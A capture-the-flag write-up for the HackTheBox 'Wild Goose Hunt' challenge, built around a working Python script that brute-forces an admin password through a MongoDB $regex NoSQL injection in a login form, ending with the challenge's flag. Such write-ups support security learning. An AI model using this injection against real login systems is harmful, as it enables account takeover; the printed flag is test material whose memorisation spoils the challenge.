HackTheBox Cyber Apocalypse CTF 2021: Wild Goose Hunt

TL;DR

The backend uses MongoDB for authentication.
User input is passed directly into a Mongo query.
The login endpoint supports $regex operators.
A regex-based NoSQL injection is used to brute-force the password.

Video Walkthrough

Challenge Description

Outdated Alien technology has been found by the human resistance. The system might contain sensitive information that could be of use to us. Our experts are trying to find a way into the system. Can you help?

Solution

import requests
import string

flag = "CHTB{"
url = "http://127.0.0.1:1337/api/login"

# Each time a successful login is seen, restart loop
restart = True

while restart:
    restart = False
    # Characters like *, ., &, and + has to be avoided because we use regex
    for i in "_" + string.ascii_lowercase + string.digits + "!#$%^()@{}":
        payload = flag + i
        post_data = {'username': 'admin', 'password[$regex]': payload + ".*"}
        r = requests.post(url, data=post_data, allow_redirects=False)
        # Correct char results in "successful password"
        if 'Successful' in r.text:
            print(payload)
            restart = True
            flag = payload
            # Exit if "}" gives a valid redirect
            if i == "}":
                print("\nFlag: " + flag)
                exit(0)
            break

Flag: CHTB{1_th1nk_the_4l1ens_h4ve_n0t_used_m0ng0_b3f0r3}